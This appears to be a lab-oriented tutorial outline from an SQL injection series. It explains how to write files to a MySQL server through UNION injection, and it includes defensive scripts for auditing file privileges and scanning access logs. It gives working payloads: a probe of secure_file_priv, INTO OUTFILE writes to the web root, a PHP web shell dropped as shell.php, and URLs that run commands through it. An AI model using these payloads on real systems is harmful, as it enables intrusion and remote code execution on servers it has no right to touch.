SQLi Series - Database Enumeration Write File - 09

Objective:

To provide a detailed, step-by-step guide on writing files to a back-end server through SQL injection vulnerabilities, enabling learners to fully understand and reproduce the techniques safely.

Introduction to File Writing in Modern DBMSes

a) Explanation of the restrictions on file writing in modern DBMSes

  • Default disabling of file-write functionality

  • Requirement of certain privileges for DBAs to write files

b) Importance of checking sufficient rights and DBMS file-writing allowance before attempting to write files

Prerequisites for Writing Files in MySQL

a) User with FILE privilege enabled

  • Explanation of the FILE privilege and its necessity for file writing

b) MySQL global secure_file_priv variable not enabled

  • Definition and purpose of the secure_file_priv variable

  • Impact of different values (empty, specific directory, NULL) on file reading/writing capabilities

c) Write access to the target location on the back-end server

  • Importance of having proper write permissions for the desired file location

Checking the secure_file_priv Variable

a) Using the SHOW VARIABLES statement in MySQL

  • Syntax: SHOW VARIABLES LIKE 'secure_file_priv';

  • Explanation of the query's purpose

b) Retrieving the value using a SELECT statement in a UNION injection

  • Location of global variables in the INFORMATION_SCHEMA database

  • Structure of the global_variables table (variable_name and variable_value columns)

  • Constructing the SQL query to retrieve the secure_file_priv value


SELECT variable_name, variable_value FROM information_schema.global_variables WHERE variable_name="secure_file_priv"

c) Adapting the query for a UNION injection payload

  • Adding junk columns to match the total number of columns in the original query

  • Example payload:


cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -

d) Interpreting the result and its impact on file reading/writing capabilities
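The prerequisites and the three kinds of secure_file_priv value listed above can be turned into an audit check. The block below is an added example, not code from the original post; the function names, grant strings and paths are constructed for illustration. It relies on MySQL's documented behaviour: an empty value places no directory restriction on import/export, a directory path confines them to that directory, and NULL disables them.

```python
import os
import re

def has_file_privilege(grants):
    """True if a SHOW GRANTS line gives FILE (or ALL PRIVILEGES) ON *.*."""
    for grant in grants:
        m = re.match(r"GRANT\s+(.*?)\s+ON\s+\*\.\*\s+TO\s", grant, re.I)
        if not m:
            continue  # database- or table-level grant: FILE is global only
        privs = [p.strip().upper() for p in m.group(1).split(",")]
        if "FILE" in privs or "ALL PRIVILEGES" in privs:
            return True
    return False

def outfile_exposure(secure_file_priv, grants, target_dir):
    """Classify whether SELECT ... INTO OUTFILE could reach target_dir.

    secure_file_priv: None for NULL, "" for empty, otherwise a directory.
    The third prerequisite (OS write permission for the mysqld user on
    target_dir) is not checked here; verify it on the host itself.
    """
    if not has_file_privilege(grants):
        return "blocked: account lacks FILE"
    if secure_file_priv is None:
        return "blocked: secure_file_priv is NULL"
    if secure_file_priv == "":
        return "exposed: no directory restriction"
    base = os.path.normpath(secure_file_priv)
    target = os.path.normpath(target_dir)
    if os.path.commonpath([base, target]) == base:
        return "exposed: target inside secure_file_priv"
    return "blocked: target outside secure_file_priv"

# Constructed sample grants for two hypothetical accounts.
APP_GRANTS = [
    "GRANT USAGE ON *.* TO `webapp`@`localhost`",
    "GRANT SELECT, INSERT ON `shop`.* TO `webapp`@`localhost`",
]
REPORT_GRANTS = ["GRANT SELECT, FILE ON *.* TO `report`@`localhost`"]

if __name__ == "__main__":
    for value in (None, "", "/var/lib/mysql-files/"):
        print(repr(value), outfile_exposure(value, REPORT_GRANTS, "/var/www/html"))
    print(outfile_exposure("", APP_GRANTS, "/var/www/html"))
```

An application account should land in the "lacks FILE" case, and the server in the NULL or dedicated-directory case, so that a web root is never a reachable export target.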

Using SELECT INTO OUTFILE for File Writing

a) Explanation of the SELECT INTO OUTFILE statement

  • Purpose and common use cases (e.g., exporting data from tables)

  • Syntax: SELECT ... INTO OUTFILE '...'

b) Examples of writing table content to a file

  • Selecting all columns from a table and writing to a file

SELECT * FROM users INTO OUTFILE '/tmp/credentials';

  • Verifying the file content on the back-end server

c) Writing arbitrary data to a file using SELECT statements

  • Selecting a string value and writing it to a file

SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';

  • Verifying the file content and ownership on the back-end server

d) Tip: Using the FROM_BASE64() function for advanced file exports, including binary data

Writing Files through SQL Injection

a) Attempting to write a text file to the web root directory

  • Constructing the query to write a test string to a file

SELECT 'file written successfully!' INTO OUTFILE '/var/www/html/proof.txt'

  • Adapting the query for a UNION injection payload

cn' UNION SELECT 1,'file written successfully!',3,4 INTO OUTFILE '/var/www/html/proof.txt'-- -

cn' union select 1,'test',3,4 into outfile '/tmp/test.txt'-- -

  • Verifying the file's existence in the web root directory

b) Finding the web root directory

  • Using LOAD_FILE to read server configuration files (Apache, Nginx, IIS)

  • Searching online for possible configuration locations

  • Running a fuzzing scan to test different potential web roots (Linux and Windows wordlists)

  • Utilizing server errors to identify the web directory

c) Writing a PHP web shell

  • Constructing a simple PHP web shell payload

<?php system($_REQUEST[0]); ?>

  • Adapting the UNION injection payload to write the web shell

cn' UNION SELECT "",'<?php system($_REQUEST[0]); ?>',"","" INTO OUTFILE '/var/www/html/shell.php'-- -

  • Verifying the web shell's existence and functionality by executing commands via the 0 parameter

http://SERVER_IP:PORT/shell.php?0=id

  • Confirming code execution and identifying the running user (e.g., www-data)

http://94.237.63.83:49004/shell.php?0=cat+../flag.txt
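The payloads in this section leave recognizable traces in web server access logs once the query string is URL-decoded. The block below is an added detection example, not code from the original post; the log lines, the /search.php endpoint, the port_code parameter and the client address are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# MySQL file-related constructs that this page's payloads rely on.
PATTERNS = {
    "into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "secure_file_priv_probe": re.compile(r"\bsecure_file_priv\b", re.I),
}

# Common/combined log format: client IP ... "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP range, hypothetical endpoint).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] '
    '"GET /search.php?port_code=cn HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] '
    '"GET /search.php?port_code=cn%27+UNION+SELECT+1%2Cvariable_name%2C'
    'variable_value%2C4+FROM+information_schema.global_variables+WHERE+'
    'variable_name%3D%22secure_file_priv%22--+- HTTP/1.1" 200 640',
    '203.0.113.7 - - [12/Mar/2024:10:02:30 +0000] '
    '"GET /search.php?port_code=cn%27+union+select+1%2C%27test%27%2C3%2C4+'
    'into+outfile+%27%2Ftmp%2Ftest.txt%27--+- HTTP/1.1" 200 512',
]

def scan_line(line):
    """Return an alert dict if the request's query string matches a pattern."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    # Decode %XX and '+', then collapse whitespace runs before matching.
    decoded = " ".join(unquote_plus(target.query).split())
    hits = sorted(name for name, rx in PATTERNS.items() if rx.search(decoded))
    if not hits:
        return None
    return {"ip": m.group("ip"), "path": target.path,
            "status": int(m.group("status")), "hits": hits}

def scan(lines):
    """Scan an iterable of access-log lines and return all alerts."""
    return [alert for alert in map(scan_line, lines) if alert]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Only GET query strings are visible in an access log; POST bodies need the same patterns applied at a WAF, in application logging, or against the MySQL general query log.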

Best Practices and Safety Considerations

  • Always test in a controlled environment to avoid unintended consequences

  • Use the techniques responsibly and only on systems you have explicit permission to test

  • Properly secure and clean up any files written during testing

  • Stay updated on the latest security patches and best practices for preventing SQL injection vulnerabilities

Checkpoint Exercise

  • Set up a vulnerable MySQL-based web application in a safe testing environment

  • Attempt to write a text file to the web root using a UNION-based SQL injection payload

  • Verify the file's existence and content on the back-end server

  • Write a PHP web shell and confirm code execution by running a basic command

Conclusion

  • Recap of the key concepts and techniques covered in the guide

  • Emphasis on the importance of continuous learning and staying updated with the latest security practices

  • Encouragement to apply the acquired knowledge responsibly and ethically
